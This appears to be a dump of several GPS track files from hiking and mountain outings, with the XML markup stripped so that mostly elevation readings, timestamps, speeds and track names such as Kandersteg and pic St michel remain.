+
+
+1671.1328125
+
+
+1652.83203125
+
+
+1643.8046875
+
+
+1621.03125
+
+
+1618.33984375
+
+
+1599.09765625
+
+
+1584.74609375
+
+
+1573.40234375
+
+
+1578.6328125
+
+
+1577.5
+
+
+1570.62890625
+
+
+1570.140625
+
+
+1559.37109375
+
+
+1555.1171875
+
+
+1541.45703125
+
+
+1535.9921875
+
+
+1533.2109375
+
+
+1536.40234375
+
+
+1531.45703125
+
+
+1528.69921875
+
+
+1526.11328125
+
+
+1527.12890625
+
+
+1527.60546875
+ "
+"
+
+
+
+
+
+
+
+Font d'Urle
+15 juin 2017 12:32 pm
+
+
+
+1445.653
+2017-06-15T10:32:09Z
+
+
+1442.894
+2017-06-15T10:33:45Z
+
+
+1446.01
+2017-06-15T10:35:53Z
+
+
+1449.982
+2017-06-15T10:37:15Z
+
+
+1453.646
+2017-06-15T10:38:44Z
+
+
+1459.448
+2017-06-15T10:40:54Z
+
+
+1484.352
+2017-06-15T10:45:57Z
+
+
+1496.28
+2017-06-15T10:49:44Z
+
+
+1525.979
+2017-06-15T10:55:45Z
+
+
+1523.846
+2017-06-15T10:57:23Z
+
+
+1525.277
+2017-06-15T11:00:17Z
+
+
+1535.141
+2017-06-15T11:02:43Z
+
+
+1549.781
+2017-06-15T11:04:33Z
+
+
+1547.412
+2017-06-15T11:05:44Z
+
+
+1547.545
+2017-06-15T11:06:43Z
+
+
+1547.39
+2017-06-15T11:10:08Z
+
+
+1544.904
+2017-06-15T11:12:26Z
+
+
+1545.895
+2017-06-15T11:13:32Z
+
+
+1547.235
+2017-06-15T11:15:38Z
+
+
+1536.243
+2017-06-15T11:16:28Z
+
+
+1537.245
+2017-06-15T11:16:50Z
+
+
+1541.734
+2017-06-15T11:18:45Z
+
+
+1543.669
+2017-06-15T11:19:09Z
+
+
+1539.197
+2017-06-15T11:22:00Z
+
+
+1536.827
+2017-06-15T11:24:04Z
+
+
+1536.734
+2017-06-15T11:24:29Z
+
+
+1538.535
+2017-06-15T11:25:27Z
+
+
+1534.368
+2017-06-15T11:28:11Z
+
+
+1520.95
+2017-06-15T11:32:59Z
+
+
+1521.73
+2017-06-15T11:34:00Z
+
+
+1523.798
+2017-06-15T11:35:19Z
+
+
+1522.298
+2017-06-15T11:40:56Z
+
+
+1525.623
+2017-06-15T11:41:51Z
+
+
+1529.762
+2017-06-15T11:43:26Z
+
+
+1547.408
+2017-06-15T11:46:17Z
+
+
+1552.18
+2017-06-15T11:47:00Z
+
+
+1553.415
+2017-06-15T11:48:57Z
+
+
+1554.275
+2017-06-15T11:49:49Z
+
+
+1551.287
+2017-06-15T11:51:00Z
+
+
+1550.34
+2017-06-15T11:52:34Z
+
+
+1547.154
+2017-06-15T11:54:29Z
+
+
+1546.807
+2017-06-15T11:56:48Z
+
+
+1560.619
+2017-06-15T11:57:53Z
+
+
+1567.281
+2017-06-15T11:58:58Z
+
+
+1582.863
+2017-06-15T12:01:28Z
+
+
+1599.398
+2017-06-15T12:08:23Z
+
+
+1591.413
+2017-06-15T12:09:36Z
+
+
+1562.574
+2017-06-15T12:11:02Z
+
+
+1549.573
+2017-06-15T12:12:00Z
+
+
+1537.548
+2017-06-15T12:14:08Z
+
+
+1527.577
+2017-06-15T12:16:15Z
+
+
+1533.735
+2017-06-15T12:18:15Z
+
+
+1535.359
+2017-06-15T12:19:32Z
+
+
+1530.121
+2017-06-15T12:24:00Z
+
+
+1532.706
+2017-06-15T12:25:16Z
+
+
+1531.417
+2017-06-15T12:26:10Z
+
+
+1524.827
+2017-06-15T12:28:01Z
+
+
+1520.415
+2017-06-15T12:30:08Z
+
+
+1519.607
+2017-06-15T12:32:53Z
+
+
+1517.761
+2017-06-15T12:36:18Z
+
+
+1511.862
+2017-06-15T12:39:14Z
+
+
+1502.224
+2017-06-15T12:41:24Z
+
+
+1500.969
+2017-06-15T12:42:53Z
+
+
+1488.858
+2017-06-15T12:45:24Z
+
+
+1482.2
+2017-06-15T12:46:10Z
+
+
+1473.867
+2017-06-15T12:47:25Z
+
+
+1454.639
+2017-06-15T12:48:56Z
+
+
+1453.027
+2017-06-15T12:50:00Z
+
+
+1450.73
+2017-06-15T12:51:45Z
+
+
+1447.546
+2017-06-15T12:53:17Z
+
+
+1446.253
+2017-06-15T12:54:27Z
+
+
+1441.26
+2017-06-15T12:56:32Z
+
+
+1441.603
+2017-06-15T12:57:01Z
+
+
+1443.286
+2017-06-15T12:58:05Z
+
+
+
+ "
+"
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+ "
+"
+
+
+
+
+
+
+
+User Track
+Track 1
+
+
+
+1625.5
+2016-09-10T08:32:22Z
+0.0 kmh
+
+
+1624.3
+2016-09-10T08:38:55Z
+0.9 kmh
+
+
+1622.3
+2016-09-10T08:39:29Z
+1.4 kmh
+
+
+1624.0
+2016-09-10T08:40:57Z
+5.0 kmh
+
+
+1623.7
+2016-09-10T08:41:25Z
+5.0 kmh
+
+
+1642.1
+2016-09-10T08:43:50Z
+5.0 kmh
+
+
+1645.3
+2016-09-10T08:44:20Z
+4.2 kmh
+
+
+1673.5
+2016-09-10T08:48:01Z
+5.0 kmh
+
+
+1686.8
+2016-09-10T08:51:22Z
+3.9 kmh
+
+
+1685.6
+2016-09-10T08:53:47Z
+5.0 kmh
+
+
+1688.7
+2016-09-10T08:55:17Z
+5.0 kmh
+
+
+1689.4
+2016-09-10T08:55:51Z
+3.5 kmh
+
+
+1690.1
+2016-09-10T08:56:16Z
+5.0 kmh
+
+
+1693.6
+2016-09-10T08:57:13Z
+5.0 kmh
+
+
+1695.4
+2016-09-10T08:58:21Z
+5.0 kmh
+
+
+1699.8
+2016-09-10T08:59:31Z
+4.2 kmh
+
+
+1705.5
+2016-09-10T09:00:21Z
+3.1 kmh
+
+
+1714.2
+2016-09-10T09:02:14Z
+5.0 kmh
+
+
+1725.0
+2016-09-10T09:03:49Z
+5.0 kmh
+
+
+1731.1
+2016-09-10T09:05:50Z
+5.0 kmh
+
+
+1733.2
+2016-09-10T09:07:06Z
+4.3 kmh
+
+
+1734.3
+2016-09-10T09:07:37Z
+5.0 kmh
+
+
+1737.9
+2016-09-10T09:09:22Z
+5.0 kmh
+
+
+1738.8
+2016-09-10T09:10:01Z
+5.0 kmh
+
+
+1741.8
+2016-09-10T09:10:42Z
+5.0 kmh
+
+
+1744.0
+2016-09-10T09:11:32Z
+2.8 kmh
+
+
+1748.2
+2016-09-10T09:12:56Z
+3.4 kmh
+
+
+1758.6
+2016-09-10T09:14:56Z
+4.5 kmh
+
+
+1763.7
+2016-09-10T09:15:36Z
+5.0 kmh
+
+
+1773.4
+2016-09-10T09:17:19Z
+5.0 kmh
+
+
+1779.4
+2016-09-10T09:19:04Z
+5.0 kmh
+
+
+1788.7
+2016-09-10T09:20:45Z
+4.5 kmh
+
+
+1815.0
+2016-09-10T09:25:37Z
+2.9 kmh
+
+
+1841.0
+2016-09-10T09:30:15Z
+5.0 kmh
+
+
+1843.6
+2016-09-10T09:34:43Z
+5.0 kmh
+
+
+1846.2
+2016-09-10T09:36:23Z
+5.0 kmh
+
+
+1852.5
+2016-09-10T09:40:31Z
+6.2 kmh
+
+
+1857.6
+2016-09-10T09:44:07Z
+5.0 kmh
+
+
+1865.1
+2016-09-10T09:49:03Z
+5.0 kmh
+
+
+1876.0
+2016-09-10T09:54:18Z
+5.0 kmh
+
+
+1880.7
+2016-09-10T09:56:22Z
+5.0 kmh
+
+
+1880.7
+2016-09-10T09:56:23Z
+5.0 kmh
+
+
+1914.6
+2016-09-10T10:02:13Z
+5.0 kmh
+
+
+1979.5
+2016-09-10T10:11:12Z
+5.0 kmh
+
+
+1996.6
+2016-09-10T10:13:58Z
+5.0 kmh
+
+
+2010.0
+2016-09-10T10:50:24Z
+0.2 kmh
+
+
+2016.2
+2016-09-10T11:01:14Z
+5.0 kmh
+
+
+2026.1
+2016-09-10T11:02:32Z
+3.8 kmh
+
+
+2035.1
+2016-09-10T11:04:47Z
+4.5 kmh
+
+
+2056.5
+2016-09-10T11:09:04Z
+3.5 kmh
+
+
+2066.8
+2016-09-10T11:10:46Z
+5.0 kmh
+
+
+2084.9
+2016-09-10T11:16:42Z
+5.0 kmh
+
+
+2123.2
+2016-09-10T11:21:02Z
+2.3 kmh
+
+
+2133.9
+2016-09-10T11:22:25Z
+5.0 kmh
+
+
+2146.4
+2016-09-10T11:24:11Z
+5.0 kmh
+
+
+2211.5
+2016-09-10T11:34:47Z
+1.7 kmh
+
+
+2223.5
+2016-09-10T11:36:51Z
+0.6 kmh
+
+
+2277.0
+2016-09-10T11:48:26Z
+1.9 kmh
+
+
+2286.0
+2016-09-10T11:50:18Z
+5.0 kmh
+
+
+2288.1
+2016-09-10T11:52:01Z
+2.2 kmh
+
+
+2305.8
+2016-09-10T11:58:41Z
+5.0 kmh
+ "
+"
+
+
+bärhegechnübeli
+
+
+
+
+
+
+
+
+
+751.0999635000858
+
+
+750.5
+
+
+749.800010034398
+
+
+747.4000204049638
+
+
+754.4999924549464
+
+
+761.4000028787494
+
+
+765.2999981844442
+
+
+766.0999992224166
+
+
+765.0999779734503
+
+
+765.5000040799783
+
+
+767.7000262619223
+
+
+778.8999764580028
+
+
+785.0000790309945
+
+
+798.7000146531177
+
+
+800.1000031189275
+
+
+797.9000058530834
+
+
+797.1999835588765
+
+
+804.4000025641919
+
+
+807.4999930883141
+
+
+818.3999678038905
+
+
+824.2000080315873
+
+
+836.8999941582957
+
+
+860.1998343975217
+
+
+883.4000691998158
+
+
+879.0998263834271
+
+
+884.9999845489
+
+
+902.1
+
+
+907.5999595789211
+
+
+913.1000464748016
+
+
+918.5
+
+
+925.9
+
+
+941.3999418125525
+
+
+950.5999952915345
+
+
+954.1
+
+
+983.6
+
+
+977.3999441597006
+
+
+971.7999953792273
+
+
+971.5999344014202
+
+
+950.5999699983729
+
+
+947.6
+
+
+955.4999750129854
+
+
+943.9
+
+
+919.6000472923923
+
+
+906.4000594487754
+
+
+895.1999845042329
+
+
+890.7999948004757
+
+
+885.4000130167366
+
+
+877.3999382205712
+
+
+872.8000337470274
+
+
+870.2
+
+
+863.6999683205207
+
+
+854.3001143767326
+
+
+829.0001200954649
+
+
+766.1999706895543
+
+
+761.7
+
+
+754.7999811446837
+
+
+753.7999963888257
+
+
+751.1000444574457
+ "
+"
+
+
+ape@map my Phone my Guide
+
+
+
+
+
+2017-10-01 11_22_19
+
+
+
+975.0
+2017-10-01T09:22:19Z
+
+
+975.0
+2017-10-01T09:24:04Z
+
+
+974.0
+2017-10-01T09:24:30Z
+
+
+968.0
+2017-10-01T09:25:31Z
+
+
+962.0
+2017-10-01T09:26:26Z
+
+
+959.0
+2017-10-01T09:27:04Z
+
+
+959.0
+2017-10-01T09:27:35Z
+
+
+961.0
+2017-10-01T09:28:34Z
+
+
+967.0
+2017-10-01T09:29:37Z
+
+
+956.0
+2017-10-01T09:30:36Z
+
+
+946.0
+2017-10-01T09:33:18Z
+
+
+942.0
+2017-10-01T09:34:43Z
+
+
+945.0
+2017-10-01T09:38:47Z
+
+
+943.0
+2017-10-01T09:41:55Z
+
+
+932.0
+2017-10-01T09:45:06Z
+
+
+927.0
+2017-10-01T09:45:57Z
+
+
+925.0
+2017-10-01T09:46:38Z
+ "
+"
+
+
+
+
+
+
+
+Lupone
+
+
+Lupone_0
+
+
+Lupone_1
+
+
+Lupone_2
+
+
+Lupone_3
+
+
+Lupone_4
+
+
+Lupone_5
+
+
+Lupone_6
+
+
+Lupone_7
+
+
+Lupone_8
+
+
+Lupone_9
+
+
+Lupone_10
+
+
+Lupone_11
+
+
+Lupone_12
+
+
+Lupone_13
+
+
+Lupone_14
+
+
+Lupone_15
+
+
+Lupone_16
+
+
+Lupone_17
+
+
+Lupone_18
+
+
+Lupone_19
+
+
+Lupone_20
+
+
+Lupone_21
+
+
+Lupone_22
+
+
+Lupone_23
+
+
+Lupone_24
+
+
+Lupone_25
+
+
+Lupone_26
+
+
+Lupone_27
+
+
+Lupone_28
+
+
+Lupone_29
+
+
+Lupone_30
+
+
+Lupone_31
+
+
+Lupone_32
+
+
+Lupone_33
+
+
+Lupone_34
+
+
+Lupone_35
+
+
+Lupone_36
+
+
+Lupone_37
+
+
+Lupone_38
+
+
+Lupone_39
+
+
+Lupone_40
+
+
+Lupone_41
+
+
+Lupone_42
+
+
+Lupone_43
+
+
+Lupone_44
+
+
+Lupone_45
+
+
+Lupone_46
+
+
+Lupone_47
+
+
+Lupone_48
+
+
+Lupone_49
+
+
+Lupone_50
+
+
+Lupone_51
+
+
+Lupone_52
+
+
+Lupone_53
+
+
+Lupone_54
+
+
+Lupone_55
+
+
+Lupone_56
+
+
+Lupone_57
+
+
+Lupone_58
+
+
+Lupone_59
+
+
+Lupone_60
+
+
+Lupone_61
+
+
+Lupone_62
+
+
+Lupone_63
+
+
+Lupone_64
+
+
+Lupone_65
+
+
+Lupone_66
+
+
+Lupone_67
+
+
+Lupone_68
+
+
+Lupone_69
+
+
+Lupone_70
+
+
+Lupone_71
+
+
+Lupone_72
+
+
+Lupone_73
+
+
+Lupone_74
+
+
+Lupone_75
+
+
+Lupone_76
+ "
+"
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+ "
+"
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+ "
+"
+
+
+
+
+
+
+
+Linie
+
+
+
+1094.1
+
+
+1100.4
+
+
+1118.9
+
+
+1134.0
+
+
+1160.6
+
+
+1181.7
+
+
+1191.0
+
+
+1219.9
+
+
+1271.9
+
+
+1271.0
+
+
+1286.0
+
+
+1282.2
+
+
+1288.2
+
+
+1274.5
+
+
+1290.2
+
+
+1291.0
+
+
+1285.1
+
+
+1289.2
+
+
+1295.4
+
+
+1322.0
+
+
+1307.4
+
+
+1322.8
+
+
+1317.1
+
+
+1336.0
+
+
+1331.9
+
+
+1319.7
+
+
+1336.5
+
+
+1326.1
+
+
+1330.8
+
+
+1342.2
+
+
+1339.8
+
+
+1349.4
+
+
+1342.8
+
+
+1342.9
+
+
+1363.9
+
+
+1376.9
+
+
+1424.4
+
+
+1434.4
+
+
+1442.9
+
+
+1458.6
+
+
+1463.1
+
+
+1477.0
+
+
+1494.5
+
+
+1518.1
+
+
+1523.7
+
+
+1524.9
+
+
+1507.9
+
+
+1513.2
+
+
+1501.4
+
+
+1501.4
+
+
+1514.4
+
+
+1476.3
+
+
+1494.2
+
+
+1474.9
+
+
+1494.1
+
+
+1472.9
+
+
+1460.5
+
+
+1477.9
+
+
+1466.5
+
+
+1485.4
+
+
+1442.2
+
+
+1455.8
+
+
+1466.0
+
+
+1447.0
+
+
+1453.5
+
+
+1461.1
+
+
+1478.1
+
+
+1450.8
+
+
+1443.7
+
+
+1438.1
+
+
+1419.9
+
+
+1412.5
+
+
+1388.5
+
+
+1360.6
+
+
+1355.2
+
+
+1350.2
+
+
+1337.4
+
+
+1317.7
+
+
+1292.6
+
+
+1262.0
+
+
+1245.8
+
+
+1211.3
+
+
+1195.3
+
+
+1190.3
+
+
+1182.5
+ "
+"
+
+
+aguille pets rück
+
+
+
+
+
+OruxMaps
+2015-07-28T08:15:38Z
+
+
+aguille pets rück
+<h1>OruxMaps</h1><br /><hr align=""center"" width=""480"" style=""height: 2px; width: 517px""/><h2>Name: aguille pets rück</h2><br /><p>Startzeit: 07/28/2015 10:15</p><p>Zielzeit: 07/28/2015 11:41</p><p>Strecke: 3km (01:25)</p><p>Bewegungszeit: 00:54</p><p>Ø-Geschwindigkeit: 2,1km/h</p><p>Netto-Geschwindigkeit: 3,3km/h</p><p>Max. Geschwindigkeit: 7,4km/h</p><p>Minimale Höhe: 2738m</p><p>Maximale Höhe: 3344m</p><p>Steig-Geschw.: 503,5m/h</p><p>Sink-Geschw.: -508,6m/h</p><p>Aufstieg: 51m</p><p>Abstieg: -636m</p><p>Steigzeit: 00:06</p><p>Sinkzeit: 01:15</p><hr align=""center"" width=""480"" style=""height: 2px; width: 517px""/>
+
+Unbestimmt
+
+
+
+
+
+3344.63
+2015-07-28T08:15:38Z
+
+
+3313.15
+2015-07-28T08:20:32Z
+
+
+3305.5
+2015-07-28T08:27:01Z
+
+
+3296.52
+2015-07-28T08:41:44Z
+
+
+3278.65
+2015-07-28T08:43:32Z
+
+
+3260.29
+2015-07-28T08:44:56Z
+
+
+3250.66
+2015-07-28T08:45:29Z
+
+
+3241.16
+2015-07-28T08:46:05Z
+
+
+3200.15
+2015-07-28T08:47:56Z
+
+
+3170.77
+2015-07-28T08:49:45Z
+
+
+3160.39
+2015-07-28T08:51:22Z
+
+
+3122.05
+2015-07-28T08:52:46Z
+
+
+3125.53
+2015-07-28T08:54:36Z
+
+
+3104.08
+2015-07-28T08:55:54Z
+
+
+3065.05
+2015-07-28T08:59:39Z
+
+
+3062.43
+2015-07-28T09:00:27Z
+
+
+3048.36
+2015-07-28T09:02:18Z
+
+
+3038.89
+2015-07-28T09:03:42Z
+
+
+2980.04
+2015-07-28T09:11:08Z
+
+
+2924.89
+2015-07-28T09:17:43Z
+
+
+2894.09
+2015-07-28T09:21:18Z
+
+
+2857.33
+2015-07-28T09:22:59Z
+
+
+2840.88
+2015-07-28T09:25:25Z
+
+
+2836.88
+2015-07-28T09:27:57Z
+
+
+2812.17
+2015-07-28T09:30:01Z
+
+
+2786.69
+2015-07-28T09:31:13Z
+
+
+2743.85
+2015-07-28T09:35:41Z
+
+
+2759.86
+2015-07-28T09:38:11Z
+
+
+2753.42
+2015-07-28T09:39:44Z
+
+
+2756.49
+2015-07-28T09:41:20Z
+ "
+"
+
+
+
+
+
+
+
+CnocMordain
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+ "
+"
+
+
+
+
+
+
+Garmin International
+2015-05-21T17:12:17Z
+
+
+Track 038
+
+
+
+
+
+
+2015-04-21T18:41:21Z
+
+
+2015-04-21T18:41:21Z
+
+
+2015-04-21T18:41:21Z
+
+
+2015-04-21T18:41:21Z
+
+
+2015-04-21T18:41:21Z
+
+
+2015-04-21T18:41:21Z
+
+
+2015-04-21T18:41:21Z
+
+
+2015-04-21T18:41:21Z
+
+
+2015-04-21T18:41:21Z
+
+
+2015-04-21T18:41:21Z
+
+
+2015-04-21T18:41:21Z
+
+
+2015-04-21T18:41:21Z
+
+
+2015-04-21T18:41:21Z
+
+
+2015-04-21T18:41:21Z
+
+
+2015-04-21T18:41:21Z
+
+
+2015-04-21T18:41:21Z
+
+
+2015-04-21T18:41:21Z
+
+
+2015-04-21T18:41:21Z
+
+
+2015-04-21T18:41:21Z
+ "
+"
+
+
+19.07.2015 11:39
+
+Andre Bartholdi
+
+
+
+Sports Tracker
+
+
+
+
+3671.0
+2015-07-19T11:39:29Z
+
+
+3655.0
+2015-07-19T11:41:18Z
+
+
+3650.0
+2015-07-19T11:42:15Z
+
+
+3642.0
+2015-07-19T11:42:41Z
+
+
+3625.0
+2015-07-19T11:44:26Z
+
+
+3618.0
+2015-07-19T11:47:40Z
+
+
+3615.0
+2015-07-19T11:48:45Z
+
+
+3591.0
+2015-07-19T11:51:12Z
+
+
+3596.0
+2015-07-19T11:52:17Z
+
+
+3575.0
+2015-07-19T11:52:43Z
+
+
+3553.0
+2015-07-19T11:56:07Z
+
+
+3522.0
+2015-07-19T12:02:10Z
+
+
+3500.0
+2015-07-19T12:05:08Z
+
+
+3476.0
+2015-07-19T12:06:21Z
+
+
+3495.0
+2015-07-19T12:09:09Z
+
+
+3490.0
+2015-07-19T12:10:27Z
+
+
+3477.0
+2015-07-19T12:13:48Z
+
+
+3469.0
+2015-07-19T12:16:10Z
+
+
+3474.0
+2015-07-19T12:16:37Z
+
+
+3474.0
+2015-07-19T12:16:44Z
+
+
+3461.0
+2015-07-19T12:17:21Z
+
+
+3464.0
+2015-07-19T12:18:25Z
+
+
+3469.0
+2015-07-19T12:18:32Z
+
+
+3463.0
+2015-07-19T12:19:54Z
+
+
+3465.0
+2015-07-19T12:21:51Z
+ "
+"
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+ "
+"
+
+
+
+
+
+
+
+capanne
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+ "
+"
+
+
+Kandersteg
+
+Monika Teusch - Community
+
+
+
+2016-02-27T12:14:26Z
+
+Kandersteg
+
+
+
+1181.40479
+
+
+1176.14877
+
+
+1177.41623
+
+
+1175.92416
+
+
+1179.1567
+
+
+1172.06747
+
+
+1172.35202
+
+
+1173.22641
+
+
+1171.47494
+
+
+1174.69516
+
+
+1175.14291
+
+
+1180.08859
+
+
+1173.46408
+
+
+1176.82284
+
+
+1182.1318
+
+
+1189.20187
+
+
+1198.85409
+
+
+1205.68527
+
+
+1219.86129
+
+
+1226.6799
+
+
+1236.04245
+
+
+1250.90439
+
+
+1259.1766
+
+
+1273.83639
+
+
+1277.17282
+
+
+1287.39474
+
+
+1308.01022
+
+
+1318.19772
+
+
+1311.52499
+
+
+1304.61813
+
+
+1304.31503
+
+
+1301.64816
+
+
+1293.50424
+
+
+1289.71701
+
+
+1286.14108
+
+
+1279.72006
+
+
+1268.75839
+
+
+1268.43209
+
+
+1263.13144
+
+
+1254.69626
+
+
+1248.68637
+
+
+1225.40793
+
+
+1213.8049
+
+
+1214.22018
+
+
+1211.18966
+
+
+1210.91793
+
+
+1209.77548
+
+
+1209.0903
+
+
+1192.12704
+
+
+1174.78085
+
+
+1173.10202
+
+
+1174.69308
+
+
+1176.42196
+
+
+1174.29269
+
+
+1176.70285
+
+
+1176.82724
+
+
+1175.96798
+
+
+1181.93295
+ "
+"
+
+
+pic St michel
+
+
+
+
+
+OruxMaps
+2016-05-05T09:10:42Z
+
+
+pic St michel
+<h1>OruxMaps</h1><br /><hr align=""center"" width=""480"" style=""height: 2px; width: 517px""/><h2>Name: pic St michel</h2><br /><p>Startzeit: 05/05/2016 11:10</p><p>Zielzeit: 05/05/2016 12:40</p><p>Strecke: 4,8km (01:29)</p><p>Bewegungszeit: 01:11</p><p>Ø-Geschwindigkeit: 3,2km/h</p><p>Netto-Geschwindigkeit: 4km/h</p><p>Max. Geschwindigkeit: 9km/h</p><p>Minimale Höhe: 1214m</p><p>Maximale Höhe: 1959m</p><p>Steig-Geschw.: 560,2m/h</p><p>Sink-Geschw.: -298,5m/h</p><p>Aufstieg: 758m</p><p>Abstieg: -19m</p><p>Steigzeit: 01:21</p><p>Sinkzeit: 00:04</p><hr align=""center"" width=""480"" style=""height: 2px; width: 517px""/>
+
+Unbestimmt
+
+
+
+
+
+1214.63
+2016-05-05T09:10:38Z
+
+
+1281.46
+2016-05-05T09:10:41Z
+
+
+1267.92
+2016-05-05T09:12:27Z
+
+
+1279.93
+2016-05-05T09:14:20Z
+
+
+1289.94
+2016-05-05T09:16:51Z
+
+
+1286.0
+2016-05-05T09:17:26Z
+
+
+1295.42
+2016-05-05T09:17:46Z
+
+
+1311.57
+2016-05-05T09:18:59Z
+
+
+1319.82
+2016-05-05T09:19:27Z
+
+
+1336.96
+2016-05-05T09:21:20Z
+
+
+1365.05
+2016-05-05T09:24:27Z
+
+
+1390.1
+2016-05-05T09:26:31Z
+
+
+1429.8
+2016-05-05T09:30:35Z
+
+
+1433.31
+2016-05-05T09:30:52Z
+
+
+1439.64
+2016-05-05T09:31:17Z
+
+
+1446.61
+2016-05-05T09:32:02Z
+
+
+1436.08
+2016-05-05T09:32:55Z
+
+
+1444.95
+2016-05-05T09:34:07Z
+
+
+1445.79
+2016-05-05T09:35:07Z
+
+
+1445.55
+2016-05-05T09:35:33Z
+
+
+1445.9
+2016-05-05T09:35:53Z
+
+
+1449.35
+2016-05-05T09:36:06Z
+
+
+1453.7
+2016-05-05T09:36:31Z
+
+
+1458.97
+2016-05-05T09:37:04Z
+
+
+1471.42
+2016-05-05T09:38:37Z
+
+
+1468.21
+2016-05-05T09:39:10Z
+
+
+1471.46
+2016-05-05T09:39:50Z
+
+
+1480.43
+2016-05-05T09:41:21Z
+
+
+1486.05
+2016-05-05T09:42:40Z
+
+
+1506.92
+2016-05-05T09:43:23Z
+
+
+1508.54
+2016-05-05T09:44:37Z
+
+
+1534.95
+2016-05-05T09:46:25Z
+
+
+1536.57
+2016-05-05T09:47:34Z
+
+
+1549.54
+2016-05-05T09:49:01Z
+
+
+1559.15
+2016-05-05T09:50:23Z
+
+
+1585.4
+2016-05-05T09:52:17Z
+
+
+1588.48
+2016-05-05T09:53:03Z
+
+
+1600.2
+2016-05-05T09:54:02Z
+
+
+1606.49
+2016-05-05T09:55:28Z
+
+
+1621.13
+2016-05-05T09:56:33Z
+
+
+1647.07
+2016-05-05T09:58:42Z
+
+
+1680.4
+2016-05-05T10:00:50Z
+
+
+1675.57
+2016-05-05T10:01:18Z
+
+
+1683.02
+2016-05-05T10:01:55Z
+
+
+1696.47
+2016-05-05T10:03:07Z
+
+
+1698.64
+2016-05-05T10:03:35Z
+
+
+1705.69
+2016-05-05T10:04:32Z
+
+
+1736.05
+2016-05-05T10:07:50Z
+
+
+1748.01
+2016-05-05T10:09:07Z
+
+
+1759.18
+2016-05-05T10:10:54Z
+
+
+1842.04
+2016-05-05T10:19:56Z
+
+
+1845.49
+2016-05-05T10:21:15Z
+
+
+1867.55
+2016-05-05T10:24:19Z
+
+
+1869.33
+2016-05-05T10:25:38Z
+
+
+1903.54
+2016-05-05T10:29:35Z
+
+
+1927.29
+2016-05-05T10:33:58Z
+
+
+1926.63
+2016-05-05T10:35:05Z
+
+
+1927.61
+2016-05-05T10:36:48Z
+
+
+1951.02
+2016-05-05T10:39:05Z
+
+
+1959.18
+2016-05-05T10:40:38Z
+ "
+"
+
+
+
+
+
+
+Garmin International
+2015-01-18T14:27:50Z
+
+2015-01-18 15:27:46
+
+
+
+
+
+
+1569.01
+2015-01-18T13:11:54Z
+
+
+1592.56
+2015-01-18T13:18:02Z
+
+
+1593.52
+2015-01-18T13:18:33Z
+
+
+1590.16
+2015-01-18T13:19:52Z
+
+
+1593.52
+2015-01-18T13:21:01Z
+
+
+1591.6
+2015-01-18T13:23:17Z
+
+
+1586.31
+2015-01-18T13:23:42Z
+
+
+1579.58
+2015-01-18T13:24:23Z
+
+
+1575.26
+2015-01-18T13:25:19Z
+
+
+1570.45
+2015-01-18T13:26:50Z
+
+
+1562.28
+2015-01-18T13:28:48Z
+
+
+1552.67
+2015-01-18T13:30:32Z
+
+
+1543.53
+2015-01-18T13:31:19Z
+
+
+1531.04
+2015-01-18T13:32:07Z
+
+
+1512.29
+2015-01-18T13:34:52Z
+
+
+1507.0
+2015-01-18T13:35:40Z
+
+
+1499.31
+2015-01-18T13:36:16Z
+
+
+1485.85
+2015-01-18T13:37:12Z
+
+
+1481.53
+2015-01-18T13:38:39Z
+
+
+1481.05
+2015-01-18T13:38:57Z
+
+
+1460.38
+2015-01-18T13:40:45Z
+
+
+1456.05
+2015-01-18T13:41:00Z
+
+
+1443.56
+2015-01-18T13:42:02Z
+
+
+1430.58
+2015-01-18T13:43:21Z
+
+
+1420.0
+2015-01-18T13:44:14Z
+
+
+1401.74
+2015-01-18T13:46:00Z
+
+
+1379.15
+2015-01-18T13:48:11Z
+
+
+1365.69
+2015-01-18T13:49:16Z
+
+
+1356.08
+2015-01-18T13:51:09Z
+
+
+1336.37
+2015-01-18T13:52:02Z
+
+
+1333.49
+2015-01-18T13:52:34Z
+
+
+1334.93
+2015-01-18T13:52:51Z
+
+
+1345.5
+2015-01-18T13:55:04Z
+
+
+1341.18
+2015-01-18T13:56:12Z
+
+
+1339.73
+2015-01-18T13:56:56Z
+
+
+1349.83
+2015-01-18T13:58:59Z
+
+
+1351.27
+2015-01-18T13:59:57Z
+
+
+1358.96
+2015-01-18T14:02:22Z
+
+
+1384.44
+2015-01-18T14:06:21Z
+
+
+1383.96
+2015-01-18T14:07:27Z
+
+
+1390.68
+2015-01-18T14:09:39Z
+
+
+1392.61
+2015-01-18T14:10:23Z
+
+
+1394.05
+2015-01-18T14:12:43Z
+
+
+1401.74
+2015-01-18T14:14:06Z
+
+
+1407.03
+2015-01-18T14:15:32Z
+
+
+1418.08
+2015-01-18T14:17:21Z
+
+
+1419.04
+2015-01-18T14:19:04Z
+
+
+1420.97
+2015-01-18T14:20:56Z
+
+
+1420.49
+2015-01-18T14:22:00Z
+
+
+1415.2
